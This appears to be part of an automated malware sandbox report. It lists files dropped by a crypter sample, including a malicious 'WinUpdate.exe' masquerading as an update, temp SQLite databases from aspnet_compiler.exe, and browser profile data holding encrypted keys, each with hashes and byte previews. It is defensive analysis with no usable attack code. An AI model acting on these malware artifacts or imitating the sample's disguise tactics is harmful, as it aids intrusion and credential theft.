                                                                                                                                                                                                                File Type:MS Windows icon resource - 9 icons, 48x48, 16 colors, 4 bits/pixel, 32x32, 16 colors, 4 bits/pixel
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):25214
                                                                                                                                                                                                                Entropy (8bit):5.835474441553232
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:0dAfBqLXaIkeASzZ0oK78hUZZZgYa8IFDAcVraGFIdcTtwbMZ:0dawLXaIkjkqkhUZZZ3DIrd7RibM
                                                                                                                                                                                                                MD5:FA63A0160B9FF05DC70CFBCA82B465B6
                                                                                                                                                                                                                SHA1:0493E1DA3943D27A4A96071F914B9ED01E9C0DAA
                                                                                                                                                                                                                SHA-256:D3A14188ECCD7761CD20CE86237F481A4BCDDFFCD460871BD7B4504F6162D9DA
                                                                                                                                                                                                                SHA-512:496A7610857E77CB6CC6140D82DDCC975C6CFCF63FD3995D2C9A4B6ACCAF150CDB49686867A99EA1441B8D1C70224E95327C326979E22F11ED31838D92C6C699
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:......00......h....... ......................(.......00.............. ......................h...^"..00.... ..%...'.. .... .....nM........ .h....^..(...0...`...........................................................................................................................ww.....................xx.wwp......www..............ww....x...w.......x.......ww.......w................~.......p..............x..................w....x.........p........""'xw...................""""z..................."""'z...........p......."""'............p.......**"'......................"g....................**"x......................"x.....p..............**"x..................~....x....................*..x..................~....x.....p.x.............w..................~....w........................................~....w............p...........x...........p.....~.......................~.......................~......x.........p......~..n...................~.......w.......p.......~nnnnnnngx............

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\IF{61B3A18B-036C-4C0C-B838-28845BC299F0}\licence.rtf

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):124
                                                                                                                                                                                                                Entropy (8bit):4.834602545781737
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:gOz4RJXDVWiFRcz7eVFMALMezbOGU5YB5DVALXA2n:L4VXFRcz6DqWR5JkQ2
                                                                                                                                                                                                                MD5:969D154352C0FAFB84B27B8CAF22D504
                                                                                                                                                                                                                SHA1:1E1C45A31C159DE7824332BBB95134663733F3BF
                                                                                                                                                                                                                SHA-256:CFEEE7E71A82187371519F9A0C232FACF5E82889C2E4AE7BB57532E09A5C30C0
                                                                                                                                                                                                                SHA-512:B38B5759DB705A0808F2A4BFC3135613607B78795A2D216ABDA06DAB0CE1BA8F7D56412B6B5319CB07066CE6E6BD181F940949CBBB99C27DB02C36A7807B6835
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fnil\fcharset0 MS Shell Dlg;}}..\viewkind4\uc1\pard\f0\fs17\par..}...

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qvhmzst.thf.psm1

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_den2r5sr.5tw.psm1

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jf4tfhpm.lfi.ps1

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kz0h5ejf.ry2.psm1

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1ceg2q1.ftw.ps1

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rzztl3jn.a33.psm1

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5om2iq1.g10.ps1

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xr5w0kjt.afc.ps1

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\a452de1a-dc0c-41b0-9f6b-7a3dec2eea0b.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:PNG image data, 3566 x 830, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                Size (bytes):1317907
                                                                                                                                                                                                                Entropy (8bit):7.996991516907408
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:24576:CIQI1C60LkXpwPMupLCQKbjc3JB6J0q4+GaT+2xdPHG+rV/wduRi8N+arM0w+Xif:CClDVgZBCUR2xdPHXr1w8HYa4h+y6OhF
                                                                                                                                                                                                                MD5:B8C45DDA168DAFA02C6BC6843EB487A0
                                                                                                                                                                                                                SHA1:B4A0EC69B73E2467222B380301DE7D870DE1B9DF
                                                                                                                                                                                                                SHA-256:2505640D9BA32F9CC10F204BC979DD7D955D34E73A860E3DF2CDD1AD5B18EC2B
                                                                                                                                                                                                                SHA-512:CF8FB8C69BBD3CD60EC341D2737320F746465FEEC30F4BEBD981C1124636A5EC1FDD2E43B517466BA27379E7A173AC4EEFC01FFDD15603748CA9A8CD5D0A9509
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.PNG........IHDR.......>......r.....3PLTEGpL%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.foS.+....tRNS... ..`.@.0.pP.X..Z..r.IDATx^..Y..7..P..$.#...v.O.B..V....9...."N.._[.p._8..e.......r.k.}.#...#...n........T_....~........-....>...R..Z.w.k."....0....^u.../...@..z..w.S.>....=...X.4......y:j;.zLC.;.......U.5.)~....y.v=K.w......\.v]......%.v.5......Q..)......0o...g.[......ni...{<......v..6.s.......?.x....4.c{...........gZ......0l}.^......'.....z....@.~.z.{\.......0v%.....tc.5.c.+......~..zg|...Sm..K-u.....z..%.......85u..............s....0..9.3.u.....}...~..........Y.....>Tg.....]..9.....N...!.......5..#..@?.......LK.Z.|.........@.......=...........a.......XJ|....}iw.-...@..s.....P.....B...C..#.....<..`.)^...`........P.v7J:............. .vV........>.......v... ..=........8.....8............P.v-,{.......s..u..@E.......`..C.....6..#.....F{.?.d.....v..........|....=.....W{}..b.w9.....Rk.9o./s.V..s>j.w...........R...R..k].....`....R.....o......t....<.._

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp8833.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp8844.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Local\WinUpdate.exe

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe
                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3511296
                                                                                                                                                                                                                Entropy (8bit):7.939995431573425
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:49152:rbAa/I9L1n4OjdXalpe85gqWa4CRFaMQRh/7hK+OWp7W+qYp9foZWHyeHxYMp5FN:ga/K1Fa71qrMFO3DgCjqWQZWSmeMTPH
                                                                                                                                                                                                                MD5:F24A4D5B6036A3DE2EBA88868BD771F2
                                                                                                                                                                                                                SHA1:3048D822D2B80D66284D1446052DA0BA2BE27D9E
                                                                                                                                                                                                                SHA-256:2C2F38B6679224281D1F9A0BEE4AC5DB26F845E0D0EB74C0CAA2D994411EE7E2
                                                                                                                                                                                                                SHA-512:17A245A0C5E70982EA5F479319417864E122D3FEBBDF16D310D42B7F9ACB8D7135FDF9C34082CD42858A4B98E696EC02D17B69DEB249E8ED0CDFAB26EC909BFC
                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....N.e..................4...........4.. ....5...@.. ........................5......J6...`...................................4.K.....5.......................5...................................................... ............... ..H............text.....4.. ....4................. ..`.rsrc.........5.......4.............@..@.reloc........5.......5.............@..B..................4.....H........q.. I...............@1..........................................(....(....*.*...*....(b...*.0..E....... ........8........E............9...........]...8....... ....8....*..9.... ....~-...{....:....& ....8....8.... ....~-...{....:....& ....8.....(#..... ....~-...{....:....& ....8........E........0...8....s......(.... ....~-...{....:....& ....8.....I...& ....~-...{....9....& ....8........E........8......... ....8..... ....8...............l..7....&~.......*...~....*..0..

                                                                                                                                                                                                                C:\Users\user\AppData\Local\WinUpdate.exe:Zone.Identifier

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\37a5bca7-f173-4c53-9acf-cf98e7ac6589.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2053
                                                                                                                                                                                                                Entropy (8bit):5.483575124527571
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:YDEFMsFiHC0af+tm4h8qC5nV/HB+OdrxrBrZHTfRBTsBG/d2a:PNkC1f+s47U9B/lpZzZBTsI4a
                                                                                                                                                                                                                MD5:2C0B7477955F44E8CD48208A1FBD9D79
                                                                                                                                                                                                                SHA1:B4A3887E987524C6868DA85462CA86CF72771519
                                                                                                                                                                                                                SHA-256:F99B45F7AB95F92F6D90872DDC94E2ADCA32199E6A8DBDA7CAB0A07A2524790C
                                                                                                                                                                                                                SHA-512:1F09E103763E2164172337761DC85AC95D9EB00BEAA37ED8298BF2AFDDA8D8B257AA3A9E0408199EB792850372F5780B6D5124D09D2B501C0F849AB2608146AE
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABPx5s/g90WQL1OExW01Io6EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACRqq4Bb8RSJdGlFvruS9pdkK0RIMs6Pu3xEo/J7IOqpQAAAAAOgAAAAAIAACAAAABX1+rzruERe/K3LUnyPox/iShmkj700vv2ZlPpdNbbGDAAAABVXX9uAxc/A2fdoMyjMJCahnmQQse5QY37RRfdKmGWhq/WOoeG913Hg+OHx/Ln8RdAAAAA8MU+gIUsR7jlYm1jnZKZZ4ElTleFZ041M77vyPBpN1gRHds4cTfK1zaQk6Y+CAsaiPLjZ3jgTFHXa5735+QlUQ=="},"policy":{"last_statistics_update":"13354562761068147"},"profile":{"info_cache":{},"profile_counts_reported":"13354562761100081","profiles_order":[]},

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\3a0ba8c1-90fc-43d3-8b1b-2a894cc61567.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3424
                                                                                                                                                                                                                Entropy (8bit):5.290256256728402
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:PNkGSCbf+s4758rh/cIyURoDoto04BKdpZzZBTsX4u:PNBSls4MVoDU+Kvd+
                                                                                                                                                                                                                MD5:682CF5D7CA34E9088403D3AE08D104F0
                                                                                                                                                                                                                SHA1:1B4AC057F190D779B97AF2EF38086F9D1EE63C09
                                                                                                                                                                                                                SHA-256:002928C7DAFF95BC075DB070DE3F47C86A248ACC27249B3D2E112C3B14071FCE
                                                                                                                                                                                                                SHA-512:96E382DE02707902E6B2CDD6EB40B9550E3AF5CB42032B93C4885AAFEFFD695E7DD1863754451675174E8DA44BF152EDCBCB9A64BD0F412872052BAA821B4FFD
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fre":{"oem_bookmarks_set":true},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.710089163898701e+12,"network":1.710089164e+12,"ticks":6387778514.0,"uncertainty":3226051.0}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABPx5s/g90WQL1OExW01Io6EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACRqq4Bb8RSJdGlFvruS9pdkK0RIMs6Pu3xEo/J7IOqpQAAAAAOgAAAAAIAACAAAABX1+rzruERe/K3LUnyPox/iShmkj700vv2ZlPpdNbbGDAAAABVXX9uAxc/A2fdoMyjMJCahnmQQse5QY37RRfdKmGWhq/WOoeG913Hg+OHx/Ln8RdAAAAA8MU+gIUsR7jlYm1jnZKZZ4ElTleFZ041M77vyPB

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\6e665196-7622-4867-919c-5d3bd1bebbac.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):950
                                                                                                                                                                                                                Entropy (8bit):5.743922315764097
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:YKWJu5rrtCdtm4hjhKZAFeCEBZtDaeCUWO3tbvXzQQRCYfYg:Yqf+tm4h8dBrZH3BvsB0
                                                                                                                                                                                                                MD5:BD043F65ABDE722A61603E9AE5A93ECE
                                                                                                                                                                                                                SHA1:1D8190904925234F6C51FD05A1DE21708BB54A30
                                                                                                                                                                                                                SHA-256:E77ECCE517711D6DCCFBC7CF2FC60630944A7299050913D0E3F4F7067C488784
                                                                                                                                                                                                                SHA-512:4310CAFDE17394A4059A2B6ABDFC42DEDA4B6E89EA60A79E5AFFAD5C0D7965D950B4FFF30DEE751F0C0A2DBAF115FF7F5D9CBB36CAA5A851484A32A032365180
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABPx5s/g90WQL1OExW01Io6EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACRqq4Bb8RSJdGlFvruS9pdkK0RIMs6Pu3xEo/J7IOqpQAAAAAOgAAAAAIAACAAAABX1+rzruERe/K3LUnyPox/iShmkj700vv2ZlPpdNbbGDAAAABVXX9uAxc/A2fdoMyjMJCahnmQQse5QY37RRfdKmGWhq/WOoeG913Hg+OHx/Ln8RdAAAAA8MU+gIUsR7jlYm1jnZKZZ4ElTleFZ041M77vyPBpN1gRHds4cTfK1zaQk6Y+CAsaiPLjZ3jgTFHXa5735+QlUQ=="},"uninstall_metrics":{"installation_date2":"1710089160"},"user_experience_metrics":{"client_id2":"{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}C:\\Users\\user0s:92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A","diagnostics":{"last_data_collection_level_on_launch":1},"low_entropy_source3":3881,"pseudo_low_entropy_source":3992,"reset_client_id_deterministic":true,"stability":{"browser_last_live_timestamp":"13354562760777749","stats_buildtime":"1695934310","stats_version":"117.0.2045.47-64","system_crash_count":0}}}

